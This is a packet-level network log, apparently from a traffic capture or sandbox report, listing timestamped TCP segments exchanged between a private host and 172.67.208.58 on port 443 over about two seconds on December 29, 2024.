Dec 29, 2024 17:56:05.865282059 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.865295887 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.865351915 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.865358114 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.865395069 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.872740984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.872756004 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.872817039 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.872823000 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.872859955 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.880980968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.880994081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.881098986 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.881104946 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.881206989 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.889110088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.889123917 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.889180899 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.889185905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.889229059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.043941975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.043958902 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.044076920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.044085026 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.044197083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.052161932 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.052181959 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.052233934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.052242041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.052267075 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.052283049 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.060245991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.060261011 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.060367107 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.060373068 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.060472965 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.068499088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.068514109 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.068587065 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.068593979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.068633080 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.076937914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.076953888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.077027082 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.077035904 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.077075958 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.083333015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.083349943 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.083420992 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.083431005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.083471060 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.091531992 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.091547012 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.091603994 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.091613054 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.091651917 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.099652052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.099666119 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.099739075 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.099749088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.099787951 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.255580902 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.255597115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.255652905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.255661964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.255698919 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.262707949 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.262722015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.262778044 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.262784958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.262821913 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.270834923 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.270847082 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.270904064 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.270909071 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.270946980 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.279059887 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.279073954 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.279126883 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.279133081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.279165030 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.286240101 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.286252975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.286314964 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.286319971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.286360025 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.295053959 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.295078039 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.295113087 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.295125008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.295146942 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.295161963 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.302120924 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.302134991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.302174091 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.302179098 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.302210093 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.302217960 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.310225010 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.310239077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.310302973 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.310308933 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.310347080 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.466114044 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.466131926 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.466196060 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.466208935 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.466248035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.474205971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.474219084 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.474275112 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.474280119 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.474314928 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.480072975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.480113029 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.480144024 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.480150938 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.480178118 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.480192900 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.488298893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.488313913 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.488393068 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.488399029 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.488444090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.495497942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.495512009 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.495579004 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.495584965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.495624065 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.503139019 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.503153086 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.503206968 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.503213882 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.503251076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.511396885 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.511410952 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.511475086 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.511481047 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.511518002 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.519509077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.519522905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.519582033 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.519587994 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.519627094 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.675477982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.675494909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.675559998 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.675571918 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.675606012 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.675625086 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.682789087 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.682802916 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.682859898 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.682869911 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.682907104 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.690902948 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.690917015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.690962076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.690968037 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.690977097 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.692816019 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.698074102 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.698088884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.698148966 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.698157072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.698199034 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.706265926 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.706288099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.706346035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.706352949 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.706382036 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.706398010 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.714056015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.714070082 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.714137077 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.714143991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.714183092 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.722179890 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.722197056 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.722266912 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.722279072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.722317934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.730314016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.730329037 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.730391026 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.730398893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.730437994 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.901097059 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.901118040 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.901196003 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.901217937 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.901257038 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.908884048 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.908900023 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.908952951 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.908960104 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.908997059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.916095972 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.916114092 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.916173935 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.916182995 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.916232109 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.924186945 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.924202919 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.924253941 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.924262047 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.924304008 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.932405949 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.932420015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.932476044 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.932490110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.932534933 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.940025091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.940037966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.940083981 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.940093040 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.940129995 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.948280096 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.948307037 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.948331118 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.948337078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.948378086 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.955477953 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.955493927 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.955557108 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:06.955564976 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:06.955599070 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.083869934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.111757994 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.111773968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.111850977 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.111861944 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.111900091 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.119085073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.119098902 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.119148016 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.119153023 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.119184017 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.127331018 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.127345085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.127407074 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.127412081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.127449036 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.134540081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.134553909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.134617090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.134624004 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.134659052 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.142752886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.142770052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.142841101 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.142853975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.142894983 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.150393963 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.150409937 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.150489092 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.150505066 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.150546074 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.156253099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.156313896 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.156431913 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.156441927 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.156483889 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.164464951 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.164479017 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.164537907 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.164545059 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.164582014 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.172609091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.172621965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.172689915 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.172698021 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.172734022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.216866970 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.328532934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.328552008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.328588009 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.328600883 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.328634977 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.328648090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.335696936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.335711002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.335752010 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.335758924 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.335802078 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.341712952 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.341768026 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.343823910 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.343838930 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.343888044 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.343894958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.343930006 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.352041960 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.352065086 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.352097034 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.352102041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.352138042 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.352551937 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.359668016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.359699965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.359739065 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.359744072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.359776020 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.359792948 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.367893934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.367908001 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.367950916 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.367957115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.367996931 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.375077963 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.375092030 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.375144005 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.375149965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.375185013 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.383183956 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.383198023 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.383260012 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.383265972 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.383296967 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.403783083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.410784960 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.538270950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.538289070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.538326979 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.538337946 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.538347960 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.538377047 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.546711922 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.546725988 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.546777010 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.546782017 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.546819925 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.554563046 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.554575920 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.554621935 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.554627895 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.554666042 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.561724901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.561738968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.561779022 CET	49758	443	192.168.2.4	172.67.208.58
